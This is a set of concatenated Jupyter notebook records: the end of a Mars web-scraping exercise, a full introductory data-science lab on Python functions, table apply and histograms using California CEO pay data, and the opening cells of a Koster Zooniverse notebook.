"Mars Facts\n\nVisit the Mars Facts webpage here and use Pandas to scrape the table containing facts about the planet including Diameter, Mass, etc.\n\nUse Pandas to convert the data to a HTML table string.",
"_____no_output_____"
]
],
[
[
"url = \"https://space-facts.com/mars/\"\nbrowser.visit(url)",
"_____no_output_____"
],
[
"facts_html = browser.html\nsoup = bs(facts_html, \"html.parser\")",
"_____no_output_____"
],
[
"mars_dict = {}",
"_____no_output_____"
],
[
"results = soup.find('tbody').find_all('tr')",
"_____no_output_____"
],
[
"for result in results:\n column_description = result.find('td', class_=\"column-1\").text\n column_fact = result.find('td', class_=\"column-2\").text\n mars_dict[column_description] = column_fact",
"_____no_output_____"
],
[
"df = pd.DataFrame(list(mars_dict.items()), columns=['Facts', 'Data'])",
"_____no_output_____"
],
[
"df",
"_____no_output_____"
]
],
[
[
"Mars Hemispheres Visit the USGS Astrogeology site here to obtain high resolution images for each of Mar's hemispheres.",
"_____no_output_____"
]
],
[
[
"executable_path = {\"executable_path\":\"C:/Users/cgrinstead12/Desktop/Mission to Mars/chromedriver.exe\"}\nbrowser = Browser(\"chrome\", **executable_path, headless = False)\nurl = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'",
"_____no_output_____"
],
[
"hemispheres = ['Cerberus Hemisphere Enhanced', \n 'Schiaparelli Hemisphere Enhanced', \n 'Syrtis Major Hemisphere Enhanced', \n 'Valles Marineris Hemisphere Enhanced']\nlinks = []\nfor hemisphere in hemispheres:\n browser.visit(url)\n browser.click_link_by_partial_text(hemisphere)\n highresMars_html = browser.html\n soup = bs(highresMars_html, \"html.parser\")\n image_url_hemisphere = soup.find('div', class_='downloads').a['href']\n links.append(image_url_hemisphere)\n \nhemisphere_links = dict(zip(hemispheres, links))",
"_____no_output_____"
],
[
"print(hemisphere_links)",
"{'Cerberus Hemisphere Enhanced': 'http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/cerberus_enhanced.tif/full.jpg', 'Schiaparelli Hemisphere Enhanced': 'http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/schiaparelli_enhanced.tif/full.jpg', 'Syrtis Major Hemisphere Enhanced': 'http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/syrtis_major_enhanced.tif/full.jpg', 'Valles Marineris Hemisphere Enhanced': 'http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/valles_marineris_enhanced.tif/full.jpg'}\n"
]
],
[
[
"STEP 2 Use MongoDB with Flask templating to create a new HTML page that displays all of the information that was scraped from the URLs above.",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb012ab2b2b6df1fee50d47117781c4453b1c350 | 42,822 | ipynb | Jupyter Notebook | lab/lab04/.ipynb_checkpoints/lab04-checkpoint.ipynb | ds-modules/Colab-demo | cccaff13633f8a5ec697cd4aeca9087f2feec2e4 | [
"BSD-3-Clause"
] | null | null | null | lab/lab04/.ipynb_checkpoints/lab04-checkpoint.ipynb | ds-modules/Colab-demo | cccaff13633f8a5ec697cd4aeca9087f2feec2e4 | [
"BSD-3-Clause"
] | null | null | null | lab/lab04/.ipynb_checkpoints/lab04-checkpoint.ipynb | ds-modules/Colab-demo | cccaff13633f8a5ec697cd4aeca9087f2feec2e4 | [
"BSD-3-Clause"
] | null | null | null | 31.956716 | 492 | 0.604759 | [
[
[
"# Initialize Otter\nimport otter\ngrader = otter.Notebook(\"lab04.ipynb\")",
"_____no_output_____"
]
],
[
[
"# Lab 4: Functions and Visualizations",
"_____no_output_____"
],
[
"Welcome to Lab 4! This week, we'll learn about functions, table methods such as `apply`, and how to generate visualizations! \n\nRecommended Reading:\n\n* [Applying a Function to a Column](https://www.inferentialthinking.com/chapters/08/1/applying-a-function-to-a-column.html)\n* [Visualizations](https://www.inferentialthinking.com/chapters/07/visualization.html)\n\nFirst, set up the notebook by running the cell below.",
"_____no_output_____"
]
],
[
[
"import numpy as np\nfrom datascience import *\n\n# These lines set up graphing capabilities.\nimport matplotlib\n%matplotlib inline\nimport matplotlib.pyplot as plt\nplt.style.use('fivethirtyeight')\nimport warnings\nwarnings.simplefilter('ignore', FutureWarning)\n\nfrom ipywidgets import interact, interactive, fixed, interact_manual\nimport ipywidgets as widgets\n",
"_____no_output_____"
]
],
[
[
"**Deadline**: If you are not attending lab physically, you have to complete this lab and submit by Wednesday, February 12th before 8:59 A.M. in order to receive lab credit. Otherwise, please attend the lab you are enrolled in, get checked off with your (u)GSI or learning assistant **AND** submit this assignment by the end of the lab section (with whatever progress you've made) to receive lab credit.\n\n**Submission**: Once you're finished, select \"Save and Checkpoint\" in the File menu and then execute the submit cell at the end. The result will contain a link that you can use to check that your assignment has been submitted successfully. ",
"_____no_output_____"
],
[
"## 1. Defining functions\n\nLet's write a very simple function that converts a proportion to a percentage by multiplying it by 100. For example, the value of `to_percentage(.5)` should be the number 50 (no percent sign).\n\nA function definition has a few parts.\n\n##### `def`\nIt always starts with `def` (short for **def**ine):\n\n def\n\n##### Name\nNext comes the name of the function. Like other names we've defined, it can't start with a number or contain spaces. Let's call our function `to_percentage`:\n \n def to_percentage\n\n##### Signature\nNext comes something called the *signature* of the function. This tells Python how many arguments your function should have, and what names you'll use to refer to those arguments in the function's code. A function can have any number of arguments (including 0!). \n\n`to_percentage` should take one argument, and we'll call that argument `proportion` since it should be a proportion.\n\n def to_percentage(proportion)\n \nIf we want our function to take more than one argument, we add a comma between each argument name. Note that if we had zero arguments, we'd still place the parentheses () after than name. \n\nWe put a colon after the signature to tell Python it's over. If you're getting a syntax error after defining a function, check to make sure you remembered the colon!\n\n def to_percentage(proportion):\n\n##### Documentation\nFunctions can do complicated things, so you should write an explanation of what your function does. For small functions, this is less important, but it's a good habit to learn from the start. Conventionally, Python functions are documented by writing an **indented** triple-quoted string:\n\n def to_percentage(proportion):\n \"\"\"Converts a proportion to a percentage.\"\"\"\n \n \n##### Body\nNow we start writing code that runs when the function is called. This is called the *body* of the function and every line **must be indented with a tab**. Any lines that are *not* indented and left-aligned with the def statement is considered outside the function. \n\nSome notes about the body of the function:\n- We can write code that we would write anywhere else. \n- We use the arguments defined in the function signature. We can do this because we assume that when we call the function, values are already assigned to those arguments.\n- We generally avoid referencing variables defined *outside* the function. If you would like to reference variables outside of the function, pass them through as arguments!\n\n\nNow, let's give a name to the number we multiply a proportion by to get a percentage:\n\n def to_percentage(proportion):\n \"\"\"Converts a proportion to a percentage.\"\"\"\n factor = 100\n\n##### `return`\nThe special instruction `return` is part of the function's body and tells Python to make the value of the function call equal to whatever comes right after `return`. We want the value of `to_percentage(.5)` to be the proportion .5 times the factor 100, so we write:\n\n def to_percentage(proportion):\n \"\"\"Converts a proportion to a percentage.\"\"\"\n factor = 100\n return proportion * factor\n \n`return` only makes sense in the context of a function, and **can never be used outside of a function**. `return` is always the last line of the function because Python stops executing the body of a function once it hits a `return` statement.\n\n*Note:* `return` inside a function tells Python what value the function evaluates to. However, there are other functions, like `print`, that have no `return` value. For example, `print` simply prints a certain value out to the console. \n\n`return` and `print` are **very** different. ",
"_____no_output_____"
],
[
"**Question 1.1.** Define `to_percentage` in the cell below. Call your function to convert the proportion .2 to a percentage. Name that percentage `twenty_percent`.\n\n<!--\nBEGIN QUESTION\nname: q11\n-->",
"_____no_output_____"
]
],
[
[
"...\n \"\"\"\" Converts a proportion to a percentage\"\"\"\n factor = ...\n ...\n\ntwenty_percent = ...\ntwenty_percent",
"_____no_output_____"
],
[
"grader.check(\"q11\")",
"_____no_output_____"
]
],
[
[
"Like you’ve done with built-in functions in previous labs (max, abs, etc.), you can pass in named values as arguments to your function.\n\n**Question 1.2.** Use `to_percentage` again to convert the proportion named `a_proportion` (defined below) to a percentage called `a_percentage`.\n\n*Note:* You don't need to define `to_percentage` again! Like other named values, functions stick around after you define them.\n\n<!--\nBEGIN QUESTION\nname: q12\n-->",
"_____no_output_____"
]
],
[
[
"a_proportion = 2**(.5) / 2\na_percentage = ...\na_percentage",
"_____no_output_____"
],
[
"grader.check(\"q12\")",
"_____no_output_____"
]
],
[
[
"Here's something important about functions: the names assigned *within* a function body are only accessible within the function body. Once the function has returned, those names are gone. So even if you created a variable called `factor` and defined `factor = 100` inside of the body of the `to_percentage` function and then called `to_percentage`, `factor` would not have a value assigned to it outside of the body of `to_percentage`:",
"_____no_output_____"
]
],
[
[
"# You should see an error when you run this. (If you don't, you might\n# have defined factor somewhere above.)\nfactor",
"_____no_output_____"
]
],
[
[
"As we've seen with built-in functions, functions can also take strings (or arrays, or tables) as arguments, and they can return those things, too.\n\n**Question 1.3.** Define a function called `disemvowel`. It should take a single string as its argument. (You can call that argument whatever you want.) It should return a copy of that string, but with all the characters that are vowels removed. (In English, the vowels are the characters \"a\", \"e\", \"i\", \"o\", and \"u\".) You can use as many lines inside of the function to do this as you’d like.\n\n*Hint:* To remove all the \"a\"s from a string, you can use `that_string.replace(\"a\", \"\")`. The `.replace` method for strings returns a new string, so you can call `replace` multiple times, one after the other. \n\n<!--\nBEGIN QUESTION\nname: q13\n-->",
"_____no_output_____"
]
],
[
[
"def disemvowel(a_string):\n \"\"\"Removes all vowels from a string.\"\"\" \n ...\n\n# An example call to your function. (It's often helpful to run\n# an example call from time to time while you're writing a function,\n# to see how it currently works.)\ndisemvowel(\"Can you read this without vowels?\")",
"_____no_output_____"
],
[
"grader.check(\"q13\")",
"_____no_output_____"
]
],
[
[
"##### Calls on calls on calls\nJust as you write a series of lines to build up a complex computation, it's useful to define a series of small functions that build on each other. Since you can write any code inside a function's body, you can call other functions you've written.\n\nIf a function is a like a recipe, defining a function in terms of other functions is like having a recipe for cake telling you to follow another recipe to make the frosting, and another to make the jam filling. This makes the cake recipe shorter and clearer, and it avoids having a bunch of duplicated frosting recipes. It's a foundation of productive programming.\n\nFor example, suppose you want to count the number of characters *that aren't vowels* in a piece of text. One way to do that is this to remove all the vowels and count the size of the remaining string.\n\n**Question 1.4.** Write a function called `num_non_vowels`. It should take a string as its argument and return a number. That number should be the number of characters in the argument string that aren't vowels. You should use the `disemvowel` function you wrote above inside of the `num_non_vowels` function.\n\n*Hint:* The function `len` takes a string as its argument and returns the number of characters in it.\n\n<!--\nBEGIN QUESTION\nname: q14\n-->",
"_____no_output_____"
]
],
[
[
"def num_non_vowels(a_string):\n \"\"\"The number of characters in a string, minus the vowels.\"\"\"\n ...\n\n# Try calling your function yourself to make sure the output is what\n# you expect. You can also use the interact function in the next cell if you'd like.",
"_____no_output_____"
],
[
"grader.check(\"q14\")",
"_____no_output_____"
]
],
[
[
"Functions can also encapsulate code that *displays output* instead of computing a value. For example, if you call `print` inside a function, and then call that function, something will get printed.\n\nThe `movies_by_year` dataset in the textbook has information about movie sales in recent years. Suppose you'd like to display the year with the 5th-highest total gross movie sales, printed in a human-readable way. You might do this:",
"_____no_output_____"
]
],
[
[
"movies_by_year = Table.read_table(\"movies_by_year.csv\")\nrank = 5\nfifth_from_top_movie_year = movies_by_year.sort(\"Total Gross\", descending=True).column(\"Year\").item(rank-1)\nprint(\"Year number\", rank, \"for total gross movie sales was:\", fifth_from_top_movie_year)",
"_____no_output_____"
]
],
[
[
"After writing this, you realize you also wanted to print out the 2nd and 3rd-highest years. Instead of copying your code, you decide to put it in a function. Since the rank varies, you make that an argument to your function.\n\n**Question 1.5.** Write a function called `print_kth_top_movie_year`. It should take a single argument, the rank of the year (like 2, 3, or 5 in the above examples). It should print out a message like the one above. \n\n*Note:* Your function shouldn't have a `return` statement.\n\n<!--\nBEGIN QUESTION\nname: q15\n-->",
"_____no_output_____"
]
],
[
[
"...\nprint(...)\n\n...\n\n# Example calls to your function:\nprint_kth_top_movie_year(2)\nprint_kth_top_movie_year(3)",
"_____no_output_____"
],
[
"grader.check(\"q15\")",
"_____no_output_____"
],
[
"# interact also allows you to pass in an array for a function argument. It will\n# then present a dropdown menu of options.\n_ = interact(print_kth_top_movie_year, k=np.arange(1, 10))",
"_____no_output_____"
]
],
[
[
"### `print` is not the same as `return`\nThe `print_kth_top_movie_year(k)` function prints the total gross movie sales for the year that was provided! However, since we did not return any value in this function, we can not use it after we call it. Let's look at an example of another function that prints a value but does not return it.",
"_____no_output_____"
]
],
[
[
"def print_number_five():\n print(5)",
"_____no_output_____"
],
[
"print_number_five()",
"_____no_output_____"
]
],
[
[
"However, if we try to use the output of `print_number_five()`, we see that the value `5` is printed but we get a TypeError when we try to add the number 2 to it!",
"_____no_output_____"
]
],
[
[
"print_number_five_output = print_number_five()\nprint_number_five_output + 2",
"_____no_output_____"
]
],
[
[
"It may seem that `print_number_five()` is returning a value, 5. In reality, it just displays the number 5 to you without giving you the actual value! If your function prints out a value without returning it and you try to use that value, you will run into errors, so be careful!\n\nExplain to your neighbor how you might add a line of code to the `print_number_five` function (after `print(5)`) so that the code `print_number_five_output + 5` would result in the value `10`, rather than an error.",
"_____no_output_____"
],
[
"## 2. Functions and CEO Incomes\n\nIn this question, we'll look at the 2015 compensation of CEOs at the 100 largest companies in California. The data was compiled from a [Los Angeles Times analysis](http://spreadsheets.latimes.com/california-ceo-compensation/), and ultimately came from [filings](https://www.sec.gov/answers/proxyhtf.htm) mandated by the SEC from all publicly-traded companies. Two companies have two CEOs, so there are 102 CEOs in the dataset.\n\nWe've copied the raw data from the LA Times page into a file called `raw_compensation.csv`. (The page notes that all dollar amounts are in **millions of dollars**.)",
"_____no_output_____"
]
],
[
[
"raw_compensation = Table.read_table('raw_compensation.csv')\nraw_compensation",
"_____no_output_____"
]
],
[
[
"We want to compute the average of the CEOs' pay. Try running the cell below.",
"_____no_output_____"
]
],
[
[
"np.average(raw_compensation.column(\"Total Pay\"))",
"_____no_output_____"
]
],
[
[
"You should see a TypeError. Let's examine why this error occurred by looking at the values in the `Total Pay` column. \n\n**Question 2.1.** Use the `type` function and set `total_pay_type` to the type of the first value in the \"Total Pay\" column.\n\n<!--\nBEGIN QUESTION\nname: q21\n-->",
"_____no_output_____"
]
],
[
[
"total_pay_type = ...\ntotal_pay_type",
"_____no_output_____"
],
[
"grader.check(\"q21\")",
"_____no_output_____"
]
],
[
[
"**Question 2.2.** You should have found that the values in the `Total Pay` column are strings. It doesn't make sense to take the average of string values, so we need to convert them to numbers if we want to do this. Extract the first value in `Total Pay`. It's Mark Hurd's pay in 2015, in *millions* of dollars. Call it `mark_hurd_pay_string`.\n\n<!--\nBEGIN QUESTION\nname: q22\n-->",
"_____no_output_____"
]
],
[
[
"mark_hurd_pay_string = ...\nmark_hurd_pay_string",
"_____no_output_____"
],
[
"grader.check(\"q22\")",
"_____no_output_____"
]
],
[
[
"**Question 2.3.** Convert `mark_hurd_pay_string` to a number of *dollars*. \n\nSome hints, as this question requires multiple steps:\n- The string method `strip` will be useful for removing the dollar sign; it removes a specified character from the start or end of a string. For example, the value of `\"100%\".strip(\"%\")` is the string `\"100\"`. \n- You'll also need the function `float`, which converts a string that looks like a number to an actual number. \n- Finally, remember that the answer should be in dollars, not millions of dollars.\n\n<!--\nBEGIN QUESTION\nname: q23\n-->",
"_____no_output_____"
]
],
[
[
"mark_hurd_pay = ...\nmark_hurd_pay",
"_____no_output_____"
],
[
"grader.check(\"q23\")",
"_____no_output_____"
]
],
[
[
"To compute the average pay, we need to do this for every CEO. But that looks like it would involve copying this code 102 times.\n\nThis is where functions come in. First, we'll define a new function, giving a name to the expression that converts \"total pay\" strings to numeric values. Later in this lab, we'll see the payoff: we can call that function on every pay string in the dataset at once.\n\nThe next section of this lab explains how to define a function For now, just fill in the ellipses in the cell below.\n\n**Question 2.4.** Copy the expression you used to compute `mark_hurd_pay`, and use it as the return expression of the function below. But make sure you replace the specific `mark_hurd_pay_string` with the generic `pay_string` name specified in the first line in the `def` statement.\n\n*Hint*: When dealing with functions, you should generally not be referencing any variable outside of the function. Usually, you want to be working with the arguments that are passed into it, such as `pay_string` for this function. If you're using `mark_hurd_pay_string` within your function, you're referencing an outside variable!\n\n<!--\nBEGIN QUESTION\nname: q24\n-->",
"_____no_output_____"
]
],
[
[
"def convert_pay_string_to_number(pay_string):\n \"\"\"Converts a pay string like '$100' (in millions) to a number of\n dollars.\"\"\"\n ...",
"_____no_output_____"
],
[
"grader.check(\"q24\")",
"_____no_output_____"
]
],
[
[
"Running that cell doesn't convert any particular pay string. Instead, it creates a function called `convert_pay_string_to_number` that can convert *any* string with the right format to a number representing millions of dollars.\n\nWe can call our function just like we call the built-in functions we've seen. It takes one argument -- a string -- and it returns a float.",
"_____no_output_____"
]
],
[
[
"convert_pay_string_to_number('$42')",
"_____no_output_____"
],
[
"convert_pay_string_to_number(mark_hurd_pay_string)",
"_____no_output_____"
],
[
"# We can also compute Safra Catz's pay in the same way:\nconvert_pay_string_to_number(raw_compensation.where(\"Name\", are.containing(\"Safra\")).column(\"Total Pay\").item(0))",
"_____no_output_____"
]
],
[
[
"So, what have we gained by defining the `convert_pay_string_to_number` function? \nWell, without it, we'd have to copy the code `10**6 * float(some_pay_string.strip(\"$\"))` each time we wanted to convert a pay string. Now we just call a function whose name says exactly what it's doing.",
"_____no_output_____"
],
[
"## 3. `apply`ing functions\n\nDefining a function is a lot like giving a name to a value with `=`. In fact, a function is a value just like the number 1 or the text \"data\"!\n\nFor example, we can make a new name for the built-in function `max` if we want:",
"_____no_output_____"
]
],
[
[
"our_name_for_max = max\nour_name_for_max(2, 6)",
"_____no_output_____"
]
],
[
[
"The old name for `max` is still around:",
"_____no_output_____"
]
],
[
[
"max(2, 6)",
"_____no_output_____"
]
],
[
[
"Try just writing `max` or `our_name_for_max` (or the name of any other function) in a cell, and run that cell. Python will print out a (very brief) description of the function.",
"_____no_output_____"
]
],
[
[
"max",
"_____no_output_____"
]
],
[
[
"Now try writing `?max` or `?our_name_for_max` (or the name of any other function) in a cell, and run that cell. A information box should show up at the bottom of your screen a longer description of the function\n\n*Note: You can also press Shift+Tab after clicking on a name to see similar information!*",
"_____no_output_____"
]
],
[
[
"?our_name_for_max",
"_____no_output_____"
]
],
[
[
"Let's look at what happens when we set `max`to a non-function value. You'll notice that a TypeError will occur when you try calling `max`. Things like integers and strings are not callable. Look out for any functions that might have been renamed when you encounter this type of error",
"_____no_output_____"
]
],
[
[
"max = 6\nmax(2, 6)",
"_____no_output_____"
],
[
"# This cell resets max to the built-in function. Just run this cell, don't change its contents\nimport builtins\nmax = builtins.max",
"_____no_output_____"
]
],
[
[
"Why is this useful? Since functions are just values, it's possible to pass them as arguments to other functions. Here's a simple but not-so-practical example: we can make an array of functions.",
"_____no_output_____"
]
],
[
[
"make_array(max, np.average, are.equal_to)",
"_____no_output_____"
]
],
[
[
"**Question 3.1.** Make an array containing any 3 other functions you've seen. Call it `some_functions`.\n\n<!--\nBEGIN QUESTION\nname: q31\n-->",
"_____no_output_____"
]
],
[
[
"some_functions = ...\nsome_functions",
"_____no_output_____"
],
[
"grader.check(\"q31\")",
"_____no_output_____"
]
],
[
[
"Working with functions as values can lead to some funny-looking code. For example, see if you can figure out why the following code works. Check your explanation with a neighbor or a staff member.",
"_____no_output_____"
]
],
[
[
"make_array(max, np.average, are.equal_to).item(0)(4, -2, 7)",
"_____no_output_____"
]
],
[
[
"A more useful example of passing functions to other functions as arguments is the table method `apply`.\n\n`apply` calls a function many times, once on *each* element in a column of a table. It produces an *array* of the results. Here we use `apply` to convert every CEO's pay to a number, using the function you defined:",
"_____no_output_____"
]
],
[
[
"raw_compensation.apply(convert_pay_string_to_number, \"Total Pay\")",
"_____no_output_____"
]
],
[
[
"Here's an illustration of what that did:\n\n<img src=\"apply.png\"/>\n\nNote that we didn’t write `raw_compensation.apply(convert_pay_string_to_number(), “Total Pay”)` or `raw_compensation.apply(convert_pay_string_to_number(“Total Pay”))`. We just passed the name of the function, with no parentheses, to `apply`, because all we want to do is let `apply` know the name of the function we’d like to use and the name of the column we’d like to use it on. `apply` will then call the function `convert_pay_string_to_number` on each value in the column for us!\n\n**Question 3.2.** Using `apply`, make a table that's a copy of `raw_compensation` with one additional column called `Total Pay ($)`. That column should contain the result of applying `convert_pay_string_to_number` to the `Total Pay` column (as we did above). Call the new table `compensation`.\n\n<!--\nBEGIN QUESTION\nname: q32\n-->",
"_____no_output_____"
]
],
[
[
"compensation = raw_compensation.with_column(\n \"Total Pay ($)\",\n ...\n ) \ncompensation",
"_____no_output_____"
],
[
"grader.check(\"q32\")",
"_____no_output_____"
]
],
[
[
"Now that we have all the pays as numbers, we can learn more about them through computation.\n\n**Question 3.3.** Compute the average total pay of the CEOs in the dataset.\n\n<!--\nBEGIN QUESTION\nname: q33\n-->",
"_____no_output_____"
]
],
[
[
"average_total_pay = ...\naverage_total_pay",
"_____no_output_____"
],
[
"grader.check(\"q33\")",
"_____no_output_____"
]
],
[
[
"**Question 3.4.** Companies pay executives in a variety of ways: in cash, by granting stock or other equity in the company, or with ancillary benefits (like private jets). Compute the proportion of each CEO's pay that was cash. (Your answer should be an array of numbers, one for each CEO in the dataset.)\n\n*Note:* When you answer this question, you'll encounter a red box appearing below your code cell that says something like `RuntimeWarning: invalid value encountered in true_divide`. Don't worry too much about the message. Warnings are raised by Python when it encounters an unusual condition in your code, but the condition is not severe enough to warrant throwing an error. \n\nThe warning below is Python's cryptic way of telling you that you're dividing a number by zero. If you extract the values in `Total Pay ($)` as an array, you'll see that the last element is 0.\n\n<!--\nBEGIN QUESTION\nname: q34\n-->",
"_____no_output_____"
]
],
[
[
"cash_proportion = ...\ncash_proportion",
"_____no_output_____"
],
[
"grader.check(\"q34\")",
"_____no_output_____"
]
],
[
[
"Check out the `% Change` column in `compensation`. It shows the percentage increase in the CEO's pay from the previous year. For CEOs with no previous year on record, it instead says \"(No previous year)\". The values in this column are *strings*, not numbers, so like the `Total Pay` column, it's not usable without a bit of extra work.\n\nGiven your current pay and the percentage increase from the previous year, you can compute your previous year's pay. For example, if your pay is $\\$120$ this year, and that's an increase of 50% from the previous year, then your previous year's pay was $\\frac{\\$120}{1 + \\frac{50}{100}}$, or \\$80.\n\n**Question 3.5.** Create a new table called `with_previous_compensation`. It should be a copy of `compensation`, but with the \"(No previous year)\" CEOs filtered out, and with an extra column called `2014 Total Pay ($)`. That column should have each CEO's pay in 2014.\n\n*Hint 1:* You can print out your results after each step to make sure you're on the right track.\n\n*Hint 2:* We've provided a structure that you can use to get to the answer. However, if it's confusing, feel free to delete the current structure and approach the problem your own way!\n\n<!--\nBEGIN QUESTION\nname: q35\n-->",
"_____no_output_____"
]
],
[
[
"# Definition to turn percent to number\ndef percent_string_to_num(percent_string):\n \"\"\"Converts a percentage string to a number.\"\"\"\n return ...\n\n# Compensation table where there is a previous year\nhaving_previous_year = ...\n\n# Get the percent changes as numbers instead of strings\n# We're still working off the table having_previous_year\npercent_changes = ...\n\n# Calculate the previous year's pay\n# We're still working off the table having_previous_year\nprevious_pay = ...\n\n# Put the previous pay column into the having_previous_year table\nwith_previous_compensation = ...\n\nwith_previous_compensation",
"_____no_output_____"
],
[
"grader.check(\"q35\")",
"_____no_output_____"
]
],
[
[
"**Question 3.6.** What was the average pay of these CEOs in 2014?\n\n<!--\nBEGIN QUESTION\nname: q36\n-->",
"_____no_output_____"
]
],
[
[
"average_pay_2014 = np.average(with_previous_compensation.column(\"2014 Total Pay ($)\"))\naverage_pay_2014",
"_____no_output_____"
],
[
"grader.check(\"q36\")",
"_____no_output_____"
]
],
[
[
"**Why is `apply` useful?**\n\nFor operations like arithmetic, or the functions in the NumPy library, you don't need to use `apply`, because they automatically work on each element of an array. But there are many things that don't. The string manipulation we did in today's lab is one example. Since you can write any code you want in a function, `apply` gives you total control over how you operate on data.",
"_____no_output_____"
],
[
"## 4. Histograms\nEarlier, we computed the average pay among the CEOs in our 102-CEO dataset. The average doesn't tell us everything about the amounts CEOs are paid, though. Maybe just a few CEOs make the bulk of the money, even among these 102.\n\nWe can use a *histogram* method to display the *distribution* of a set of numbers. The table method `hist` takes a single argument, the name of a column of numbers. It produces a histogram of the numbers in that column.\n\n**Question 4.1.** Make a histogram of the total pay of the CEOs in `compensation`. Check with your neighbor or a staff member to make sure you have the right plot.\n\n<!--\nBEGIN QUESTION\nname: q41\n-->",
"_____no_output_____"
]
],
[
[
"...",
"_____no_output_____"
]
],
[
[
"**Question 4.2.** How many CEOs made more than $30 million in total pay? Find the value using code, then check that the value you found is consistent with what you see in the histogram.\n\n*Hint:* Use the table method `where` and the property `num_rows`.\n\n<!--\nBEGIN QUESTION\nname: q42\n-->",
"_____no_output_____"
]
],
[
[
"num_ceos_more_than_30_million_2 = compensation.where(\"Total Pay ($)\", are.above(30000000)).num_rows\nnum_ceos_more_than_30_million_2",
"_____no_output_____"
],
[
"grader.check(\"q42\")",
"_____no_output_____"
]
],
[
[
"## 5. Project 1 Partner Form\n\nProject 1 will be released this Friday! You have the option of working with a partner that is enrolled in your lab. Your GSI will be sending out a form to match you up with a partner for this project. You may also indicate if you're working alone or have already found a partner and do not need to be paired up. This form is **mandatory** - please fill it out before submitting your lab. Set `submitted` to `True` once you've submitted the form.\n\nNote: If you are completing this lab before the early submission deadline, the form may not have been sent out yet. Set `submitted` to `True` for now, and keep an eye out for an email from your GSI later this week.\n\n<!--\nBEGIN QUESTION\nname: q5\n-->",
"_____no_output_____"
]
],
[
[
"submitted = ...",
"_____no_output_____"
],
[
"grader.check(\"q5\")",
"_____no_output_____"
]
],
[
[
"Great job! You're finished with lab 4! Be sure to...\n\n* **run all the tests** (the next cell has a shortcut for that),\n* **Save and Checkpoint** from the File menu,\n* **run the last cell to submit your work**,\n* and **ask one of the staff members to check you off**.",
"_____no_output_____"
],
[
"---\n\nTo double-check your work, the cell below will rerun all of the autograder tests.",
"_____no_output_____"
]
],
[
[
"grader.check_all()",
"_____no_output_____"
]
],
[
[
"## Submission\n\nMake sure you have run all cells in your notebook in order before running the cell below, so that all images/graphs appear in the output. The cell below will generate a zip file for you to submit. **Please save before exporting!**",
"_____no_output_____"
]
],
[
[
"# Save your notebook first, then run this cell to export your submission.\ngrader.export()",
"_____no_output_____"
]
],
[
[
" ",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb01426c40230eb84ab3f08b23b041bb22ef46e0 | 187,091 | ipynb | Jupyter Notebook | development/notebooks/koster_new_species_frames.ipynb | ocean-data-factory-sweden/koster_zooniverse | 208273da2419b7a4227e0fa5acac5141b99c6aa0 | [
"MIT"
] | null | null | null | development/notebooks/koster_new_species_frames.ipynb | ocean-data-factory-sweden/koster_zooniverse | 208273da2419b7a4227e0fa5acac5141b99c6aa0 | [
"MIT"
] | null | null | null | development/notebooks/koster_new_species_frames.ipynb | ocean-data-factory-sweden/koster_zooniverse | 208273da2419b7a4227e0fa5acac5141b99c6aa0 | [
"MIT"
] | null | null | null | 92.849132 | 141 | 0.766873 | [
[
[
"%load_ext autoreload\n%autoreload 2",
"The autoreload extension is already loaded. To reload it, use:\n %reload_ext autoreload\n"
],
[
"import sys\nsys.path.append(\"..\")\nsys.path.append(\"../upload_subjects/\")",
"_____no_output_____"
],
[
